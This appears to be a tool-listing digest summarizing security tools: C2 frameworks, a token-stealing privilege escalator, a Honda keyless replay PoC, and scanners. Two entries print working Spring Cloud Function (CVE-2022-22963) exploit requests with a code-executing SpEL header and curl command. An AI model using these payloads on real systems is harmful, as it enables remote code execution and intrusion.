CobaltBus : Cobalt Strike External C2 Integration With Azure Servicebus, C2 Traffic Via Azure Servicebus
CobaltBus is a Cobalt Strike External C2 integration with Azure Service Bus: C2 traffic via Azure Service Bus. Setup: 1. Create an Azure Service Bus. 2. Create a Shared access policy (connection string) that can only Send and Listen. 3. Edit the static connectionString variable in the Beacon C# projects to match the "Primary Connection String" value for the Shared access policy created in step 2. The same variables need...
Odin : Central IoC Scanner Based On Loki
Odin is a central IoC scanner based on Loki. General Info: this application fetches the latest Loki version, downloads it to all machines using a PowerShell script and runs it; this app then receives the response from all machines and parses the feed into CSV form. Requirements: Python 3.5+, PyQT5, psutil, pyparsing, zipfile. Fetch Odin, download and extract the latest version of Loki, and start an HTTP server to deliver the...
Auto-Elevate : Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\SYSTEM
The Auto-Elevate tool demonstrates the power of UAC bypasses and built-in features of Windows. This utility auto-locates winlogon.exe, steals and impersonates its process token, and spawns a new SYSTEM-level process with the stolen token. Combined with UAC bypass method #41 (ICMLuaUtil UAC bypass) from hfiref0x's UACME utility, this utility can auto-elevate a low-privileged Administrator account to NT AUTHORITY\SYSTEM. The following...
Subdomains.Sh : A Wrapper Around Tools I Use For Subdomain Enumeration On A Given Domain
Subdomains.Sh is a wrapper around tools used for subdomain enumeration on a given domain, written in bash, to automate the workflow. The Workflow. Installation: run the installation script: curl -s https://raw.githubusercontent.com/enenumxela/subdomains.sh/main/install.sh | bash - Or run in an ephemeral Docker container: clone the repository and run cd subdomains.sh; build the container image with ./docker-subdomains.sh build; after the build, you can run the script with the same options listed above. Each run will...
Slyther : AWS Security Tool
Slyther is an AWS security tool to check read/write/delete access for S3 buckets. Requirements: aws-cli. Installation: pip3 install -r requirements.txt Usage example: python3 slyther.py -b flaws.cloud Download
Spring-Spel-0Day-Poc : Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression
Spring-Spel-0Day-Poc is a spring-cloud/spring-cloud-function RCE exploit PoC (https://github.com/spring-cloud/spring-cloud-function). Header: spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") Build: wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip; unzip v3.1.6.zip; cd spring-cloud-function-3.1.6; cd spring-cloud-function-samples/function-sample-pojo; mvn package; java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar Get path lists for test: find . -name "*.java"|xargs -I % cat %|grep -Eo '"({8,})"'|sort -u|sed 's/"//g' … functionRouter, uppercase, lowercase … poc1: POST /functionRouter HTTP/1.1; host:127.0.0.1:8080; User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15; Connection: close; spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app"); Content-Length: 5 poc2: POST /functionRouter HTTP/1.1; host:127.0.0.1:8080; User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15...
Cloak : A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries
Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tools which have very prominent traffic fingerprints and can be blocked by simple filtering rules, it's very difficult to precisely target Cloak with...
OffensiveNotion : Notion As A Platform For Offensive Operations
OffensiveNotion combines the capabilities of a post-exploitation agent with the power and comfort of the Notion notetaking application. The agent sends data to and receives commands from your Notion page. Your C2 traffic blends right in as the agent receives instructions and posts results via the Notion developer API. And when your blue team looks for evidence of shenanigans,...
CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System
CVE-2022-27254 is a PoC for a vulnerability in Honda's Remote Keyless System (CVE-2022-27254). Summary: this is a proof of concept for CVE-2022-27254, wherein the remote keyless system on various Honda vehicles sends the same, unencrypted RF signal for each door-open, door-close, boot-open and remote start (if applicable). This allows an attacker to eavesdrop on the request and conduct a replay attack. Vehicles Affected • 2016-2020 Honda...
CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
CVE-2022-22963: to run the vulnerable Spring Boot application, run this Docker container, exposing it on port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' Or using Burp Suite: Download